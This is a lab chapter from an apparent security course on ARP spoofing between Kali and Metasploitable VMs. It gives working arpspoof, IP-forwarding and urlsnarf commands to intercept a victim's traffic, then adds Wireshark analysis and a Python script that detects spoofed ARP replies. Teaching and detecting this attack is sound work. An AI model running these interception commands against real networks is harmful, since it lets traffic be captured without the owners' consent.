Chapter 10 ARP Spoofing
In this lab we will discuss ARP spoofing. ARP spoofing is an attack in which an attacker tricks a victim into believing that they are another machine, by pretending that their MAC address maps to an IP address that is not their own.
VirtualBox emulates a virtual network with a virtual gateway. To determine the IP address of the default gateway, you need to determine the IP address of the Kali Linux virtual machine and its subnet mask.
10.2 Determining the router gateway
Step 1 Determine the IP address and subnet mask by typing the ifconfig command.
[Include picture with subnetmask and ipaddress highlighted]
Step 2 Calculate the default gateway by ANDing the subnet mask with your IP address and adding 1. The resulting number is your default gateway:
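| | Octet 1 | Octet 2 | Octet 3 | Octet 4 |
|---|---|---|---|---|
| Kali IP in binary | 0000 1010 | 0000 0000 | 0000 0010 | 0000 0100 |
| Mask in binary | 1111 1111 | 1111 1111 | 1111 1111 | 0000 0000 |
| (Mask & IP) + 1, in decimal | 10 | 0 | 2 | 1 |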
Great, now that we have determined the IP address of our virtual gateway, we can trick the Metasploitable machine on our virtual network into thinking that we are the default gateway, so that all network traffic gets forwarded by the switch to our machine. We do this by sending packets that falsely tell the Metasploitable machine that the MAC address of the Kali machine is associated with the IP address of the default gateway. This means that all traffic that was intended for the default gateway will now get routed to the Kali Linux box.
[Include ARP spoofing picture below]
Step 3 Type: ip route | grep default to get the router IP.
Step 4 On your attacker type: echo '1' > /proc/sys/net/ipv4/ip_forward
Step 5 On the attacker type: arpspoof -i eth0 -t VICTIMIP ROUTERIP
Step 6 On the attacker, in another terminal type: urlsnarf -i eth0
Step 7 On the victim, open Firefox and navigate. If you've done everything right, you will now see the traffic on the attacker.
Step 8 On the attacker: press Ctrl+C in the arpspoof terminal window to fix the ARP table and shut down the attack.
10.3 Analyzing the Network Traffic Associated with the ARP request.
Close both VMs and open the packet capture in Wireshark. Look for the ARP messages between the attacker, victim, and router.
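The same check can be scripted. The following is an added example, not part of the original lab: it parses raw Ethernet/ARP frames and reports two things visible in a capture like this one, an IP address claimed by more than one MAC address and ARP replies that no request asked for. The function names, the MAC addresses and the victim address 10.0.2.5 are assumptions made up for the sample; loading frames from a capture file is left out.

```python
import struct
from collections import Counter, defaultdict

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":       # EtherType 0x0806 = ARP
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):      # Ethernet + IPv4 only
        return None
    mac = ":".join(f"{b:02x}" for b in frame[22:28])
    spa = ".".join(map(str, frame[28:32]))
    tpa = ".".join(map(str, frame[38:42]))
    return op, mac, spa, tpa

def analyze(frames):
    """Return (conflicts, unsolicited): IPs claimed by >1 MAC, and replies nobody asked for."""
    claims, pending, unsolicited = defaultdict(set), set(), Counter()
    for op, mac, spa, tpa in filter(None, map(parse_arp, frames)):
        claims[spa].add(mac)              # every ARP packet asserts "spa is at mac"
        if op == 1:                       # request: spa is asking who has tpa
            pending.add((spa, tpa))
        elif op == 2:                     # reply: spa answers tpa
            if (tpa, spa) in pending:
                pending.discard((tpa, spa))
            else:
                unsolicited[(mac, spa)] += 1
    conflicts = {ip: sorted(m) for ip, m in claims.items() if len(m) > 1}
    return conflicts, dict(unsolicited)

def build_arp(op, sha, spa, tha, tpa):
    """Build a constructed 42-byte Ethernet+ARP frame (sample data only)."""
    to_mac = lambda s: bytes.fromhex(s.replace(":", ""))
    to_ip = lambda s: bytes(int(o) for o in s.split("."))
    eth = (b"\xff" * 6 if op == 1 else to_mac(tha)) + to_mac(sha) + b"\x08\x06"
    return (eth + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + to_mac(sha) + to_ip(spa) + to_mac(tha) + to_ip(tpa))

# Constructed sample: the MAC addresses and the victim IP 10.0.2.5 are made up.
GW_MAC, KALI_MAC, VICTIM_MAC = "52:54:00:12:35:00", "08:00:27:aa:aa:aa", "08:00:27:bb:bb:bb"
SAMPLE = [
    build_arp(1, VICTIM_MAC, "10.0.2.5", "00:00:00:00:00:00", "10.0.2.1"),  # victim asks
    build_arp(2, GW_MAC, "10.0.2.1", VICTIM_MAC, "10.0.2.5"),               # gateway answers
] + [build_arp(2, KALI_MAC, "10.0.2.1", VICTIM_MAC, "10.0.2.5")] * 3        # spoofed replies

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Unsolicited replies also occur legitimately (gratuitous ARP), so the gateway IP being claimed by two different MAC addresses is the stronger signal.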